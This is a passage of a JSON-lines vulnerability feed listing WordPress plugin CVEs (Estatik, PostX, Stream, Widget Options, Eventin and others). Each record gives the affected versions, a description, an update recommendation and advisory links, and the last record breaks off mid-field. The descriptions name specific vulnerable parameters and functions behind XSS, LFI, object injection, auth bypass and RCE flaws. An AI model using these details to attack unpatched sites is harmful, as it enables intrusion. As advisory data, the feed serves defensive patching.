{"CVE_ID":"CVE-2023-6050","slug":"estatik","versionImpact":"4.1.0","versionEndExcluding":"4.1.1","description":"The Estatik Real Estate Plugin WordPress plugin before 4.1.1 does not sanitise and escape various parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c08e0f24-bd61-4e83-a555-363568cf0e6e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c08e0f24-bd61-4e83-a555-363568cf0e6e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6049","slug":"estatik","versionImpact":"4.1.0","versionEndExcluding":"4.1.1","description":"The Estatik Real Estate Plugin WordPress plugin before 4.1.1 unserializes user input via some of its cookies, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget chain is present on the blog","recommendation":"Update to version 4.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8cfd8c1f-2834-4a94-a3fa-c0cfbe78a8b7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8cfd8c1f-2834-4a94-a3fa-c0cfbe78a8b7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6048","slug":"estatik","versionImpact":"4.1.0","versionEndExcluding":"4.1.1","description":"The Estatik Real Estate Plugin WordPress plugin before 4.1.1 does not prevent user with low privileges on the site, like subscribers, from setting any of the site's options to 1, which could be used to break sites and lead to DoS when certain options are reset","recommendation":"Update to version 4.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74cb07fe-fc82-472f-8c52-859c176d9e51\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/74cb07fe-fc82-472f-8c52-859c176d9e51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4667","slug":"feedzy-rss-feeds","versionEndExcluding":"4.1.1","description":"The RSS Aggregator by Feedzy WordPress plugin before 4.1.1 does not validate and escape some of its block options before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a388232b-a399-46a5-83e6-20c1b5df351d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a388232b-a399-46a5-83e6-20c1b5df351d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0812","slug":"ldap-login-for-intranet-sites","versionEndExcluding":"4.1.1","description":"The Active Directory Integration \/ LDAP Integration WordPress plugin before 4.1.1 does not have proper authorization or nonce values for some POST requests, leading to unauthenticated data disclosure.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ed5e1b3-f2a3-4eb1-b8ae-d3a62f600107\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ed5e1b3-f2a3-4eb1-b8ae-d3a62f600107\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4305","slug":"ultimate-post","versionImpact":"4.0.4","versionEndExcluding":"4.1.0","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin  WordPress plugin before 4.1.0 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/635be98d-4c17-4e75-871f-9794d85a2eb1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/635be98d-4c17-4e75-871f-9794d85a2eb1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5429","slug":"logo-slider-wp","versionImpact":"4.0.0","versionEndExcluding":"4.1.0","description":"The Logo Slider  WordPress plugin before 4.1.0 does not validate and escape some of its Slider Settings before outputting them back in attributes, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb76c88-aeca-42df-830e-abffd29f1141\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ddb76c88-aeca-42df-830e-abffd29f1141\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1511","slug":"user-registration","versionImpact":"4.0.4","versionEndExcluding":"4.1.0","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 's' parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.0.2\\\/modules\\\/membership\\\/includes\\\/Admin\\\/Membership\\\/ListTable.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.0.2\\\/modules\\\/membership\\\/includes\\\/Admin\\\/Membership\\\/ListTable.php#L246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246826\\\/user-registration\\\/tags\\\/4.1.0\\\/modules\\\/membership\\\/includes\\\/Admin\\\/Membership\\\/ListTable.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246826\\\/user-registration\\\/tags\\\/4.1.0\\\/modules\\\/membership\\\/includes\\\/Admin\\\/Membership\\\/ListTable.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e0bee7c-8dce-421c-af16-7e5152797e6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e0bee7c-8dce-421c-af16-7e5152797e6c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13879","slug":"stream","versionImpact":"4.0.2","versionEndExcluding":"4.1.0","description":"The Stream plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.2 due to insufficient validation on the webhook feature. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/xwp\\\/stream\\\/blob\\\/develop\\\/changelog.md#410---january-15-2025\",\"name\":\"https:\\\/\\\/github.com\\\/xwp\\\/stream\\\/blob\\\/develop\\\/changelog.md#410---january-15-2025\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226637%40stream&new=3226637%40stream&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3226637%40stream&new=3226637%40stream&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8680ad0a-7513-408d-a62d-ffb0b0e7addb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8680ad0a-7513-408d-a62d-ffb0b0e7addb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5089","slug":"defender-security","versionImpact":"4.0.2","versionEndExcluding":"4.1.0","description":"The Defender Security WordPress plugin before 4.1.0 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the login page, even when the hide login page functionality of the plugin is enabled.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.sprocketsecurity.com\\\/resources\\\/discovering-wp-admin-urls-in-wordpress-with-gravityforms\",\"name\":\"https:\\\/\\\/www.sprocketsecurity.com\\\/resources\\\/discovering-wp-admin-urls-in-wordpress-with-gravityforms\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b547488-187b-44bc-a57d-f876a7d4c87d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b547488-187b-44bc-a57d-f876a7d4c87d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5758","slug":"ultimate-post","versionImpact":"4.0.4","versionEndExcluding":"4.1.0","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin \u2013 PostX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the filterMobileText parameter in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dcc3f47-8504-4aa6-af60-03edeaa39fd7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4dcc3f47-8504-4aa6-af60-03edeaa39fd7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-4305\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2024-4305\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/635be98d-4c17-4e75-871f-9794d85a2eb1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/635be98d-4c17-4e75-871f-9794d85a2eb1\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088956%40ultimate-post%2Ftrunk&old=3076390%40ultimate-post%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3088956%40ultimate-post%2Ftrunk&old=3076390%40ultimate-post%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6694","slug":"wp-mail-smtp","versionImpact":"4.0.1","versionEndExcluding":"4.1.0","description":"The WP Mail SMTP plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 4.0.1. This is due to plugin providing the SMTP password in the SMTP Password field when viewing the settings. This makes it possible for authenticated attackers, with administrative-level access and above, to view the SMTP password for the supplied server. Although this would not be useful for attackers in most cases, if an administrator account becomes compromised this could be useful information to an attacker in a limited environment.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d4e9daf-d414-4ace-9efd-4c3e16deeb8f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d4e9daf-d414-4ace-9efd-4c3e16deeb8f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120454\\\/wp-mail-smtp\\\/trunk\\\/src\\\/Providers\\\/OptionsAbstract.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3120454\\\/wp-mail-smtp\\\/trunk\\\/src\\\/Providers\\\/OptionsAbstract.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12104","slug":"atarim-visual-collaboration","versionImpact":"4.0.9","versionEndExcluding":"4.1.0","description":"The Visual Website Collaboration, Feedback & Project Management \u2013 Atarim plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the wpf_delete_file and wpf_delete_file functions in all versions up to, and including, 4.0.9. This makes it possible for unauthenticated attackers to delete project pages and files.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225314%40atarim-visual-collaboration&new=3225314%40atarim-visual-collaboration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3225314%40atarim-visual-collaboration&new=3225314%40atarim-visual-collaboration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d40c658-a156-470e-bf93-a1f2ccec9c61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d40c658-a156-470e-bf93-a1f2ccec9c61?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12499","slug":"wp-jquery-datatable","versionImpact":"4.0.1","versionEndExcluding":"4.1.0","description":"The WP jQuery DataTable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_jdt' shortcode in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213340%40wp-jquery-datatable&new=3213340%40wp-jquery-datatable&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213340%40wp-jquery-datatable&new=3213340%40wp-jquery-datatable&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c6a6422-8255-4a3c-9ddf-b5986e1d393f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c6a6422-8255-4a3c-9ddf-b5986e1d393f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47177","slug":"wp-easy-pay","versionEndExcluding":"4.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in WP Easy Pay WP EasyPay \u2013 Square for WordPress plugin <=\u00a04.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-easy-pay\\\/wordpress-wp-easypay-square-for-wordpress-plugin-4-0-4-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-easy-pay\\\/wordpress-wp-easypay-square-for-wordpress-plugin-4-0-4-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13863","slug":"stylish-google-sheet-reader","versionImpact":"4.0","versionEndExcluding":"4.1","description":"The Stylish Google Sheet Reader 4.0  WordPress plugin before 4.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6161595-0934-4baa-9da6-73792f4b87fd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6161595-0934-4baa-9da6-73792f4b87fd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1465","slug":"wp-easy-pay","versionEndExcluding":"4.1","description":"The WP EasyPay WordPress plugin before 4.1 does not escape some generated URLs before outputting them back in pages, leading to Reflected Cross-Site Scripting issues which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13f59eb4-0744-4fdb-94b5-886ee6bdd867\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/13f59eb4-0744-4fdb-94b5-886ee6bdd867\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6441","slug":"webinar-ignition","versionImpact":"4.03.32","versionEndExcluding":"4.03.33","description":"The Webinar Solution: Create live\/evergreen\/automated\/instant webinars, stream & Zoom Meetings | WebinarIgnition plugin for WordPress is vulnerable to unauthenticated login token generation due to a missing capability check on the `webinarignition_sign_in_support_staff` and `webinarignition_register_support` functions in all versions up to, and including, 4.03.31. This makes it possible for unauthenticated attackers to generate login tokens for arbitrary WordPress users under certain circumstances, issuing authorization cookies which can lead to authentication bypass.","recommendation":"Update to version 4.03.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionAjax.php#L769\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionAjax.php#L769\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionManager.php#L1040\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionManager.php#L1040\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionManager.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class.WebinarignitionManager.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class-webinarignition.php#L549\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webinar-ignition\\\/trunk\\\/inc\\\/class-webinarignition.php#L549\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52c19707-df18-4239-af46-12ea5ee86a4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52c19707-df18-4239-af46-12ea5ee86a4b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7149","slug":"wp-event-solution","versionImpact":"4.0.8","versionEndExcluding":"4.0.9","description":"The Event Manager, Events Calendar, Tickets, Registrations \u2013 Eventin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.0.8 via multiple style parameters. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 4.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75537b61-5622-4b35-b80e-389526bd99f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75537b61-5622-4b35-b80e-389526bd99f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/speakers\\\/speakers.php#L483\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/speakers\\\/speakers.php#L483\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/events\\\/events.php#L754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/events\\\/events.php#L754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/schedule\\\/schedule.php#L368\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/schedule\\\/schedule.php#L368\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/schedule-list\\\/schedule-list.php#L293\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/schedule-list\\\/schedule-list.php#L293\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/events-tab\\\/style\\\/tab-1.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-event-solution\\\/trunk\\\/widgets\\\/events-tab\\\/style\\\/tab-1.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157415\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157415\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6138","slug":"secure-copy-content-protection","versionImpact":"4.0.8","versionEndExcluding":"4.0.9","description":"The Secure Copy Content Protection and Content Locking WordPress plugin before 4.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ef2a8d8-39d5-45d3-95de-e7bac4b7382d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ef2a8d8-39d5-45d3-95de-e7bac4b7382d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0974","slug":"social-media-widget","versionImpact":"4.0.8","versionEndExcluding":"4.0.9","description":"The Social Media Widget WordPress plugin before 4.0.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f8e5e63-a928-443e-9771-8b3f51f5eb9e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7f8e5e63-a928-443e-9771-8b3f51f5eb9e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4150","slug":"user-activity-tracking-and-log","versionEndExcluding":"4.0.9","description":"The User Activity Tracking and Log WordPress plugin before 4.0.9 does not have proper CSRF checks when managing its license, which could allow attackers to make logged in admins update and deactivate the plugin's license via CSRF attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/381ef15b-aafe-4ef4-a0bc-867d891f7f44\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/381ef15b-aafe-4ef4-a0bc-867d891f7f44\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8672","slug":"widget-options","versionImpact":"4.0.7","versionEndExcluding":"4.0.8","description":"The Widget Options \u2013 The #1 WordPress Widget & Block Control Plugin plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.0.7 via the display logic functionality that extends several page builders. This is due to the plugin allowing users to supply input that will be passed through eval() without any filtering or capability checks. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server. Special note: We suggested the vendor implement an allowlist of functions and limit the ability to execute commands to just administrators, however, they did not take our advice. We are considering this patched, however, we believe it could still be further hardened and there may be residual risk with how the issue is currently patched.","recommendation":"Update to version 4.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/pagebuilders\\\/beaver\\\/beaver.php#L825\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/pagebuilders\\\/beaver\\\/beaver.php#L825\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/pagebuilders\\\/elementor\\\/render.php#L379\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/pagebuilders\\\/elementor\\\/render.php#L379\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/widgets\\\/gutenberg\\\/gutenberg-toolbar.php#L718\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/widget-options\\\/trunk\\\/includes\\\/widgets\\\/gutenberg\\\/gutenberg-toolbar.php#L718\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192921%40widget-options&new=3192921%40widget-options&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3192921%40widget-options&new=3192921%40widget-options&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d03af4d-a1f9-4c15-a62e-f4cdbcfc9af7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d03af4d-a1f9-4c15-a62e-f4cdbcfc9af7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0467","slug":"wp-dark-mode","versionEndExcluding":"4.0.8","description":"The WP Dark Mode WordPress plugin before 4.0.8 does not properly sanitize the style parameter in shortcodes before using it to load a PHP template. This leads to Local File Inclusion on servers where non-existent directories may be traversed, or when chained with another vulnerability allowing arbitrary directory creation.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8eb431a6-59a5-4cee-84e0-156c0b31cfc4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8eb431a6-59a5-4cee-84e0-156c0b31cfc4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12024","slug":"eventprime-event-calendar-management","versionImpact":"4.0.7.3","versionEndExcluding":"4.0.7.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the em_ticket_category_data and em_ticket_individual_data parameters in all versions up to, and including, 4.0.5.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page.\r\nNote: this vulnerability requires the \"Guest Submissions\" setting to be enabled. It is disabled by default.","recommendation":"Update to version 4.0.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/admin\\\/partials\\\/metaboxes\\\/meta-box-tickets-panel-html.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/admin\\\/partials\\\/metaboxes\\\/meta-box-tickets-panel-html.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/admin\\\/partials\\\/metaboxes\\\/meta-box-tickets-panel-html.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/admin\\\/partials\\\/metaboxes\\\/meta-box-tickets-panel-html.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-ep-ajax.php#L1245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventprime-event-calendar-management\\\/tags\\\/4.0.5.3\\\/includes\\\/class-ep-ajax.php#L1245\",\"r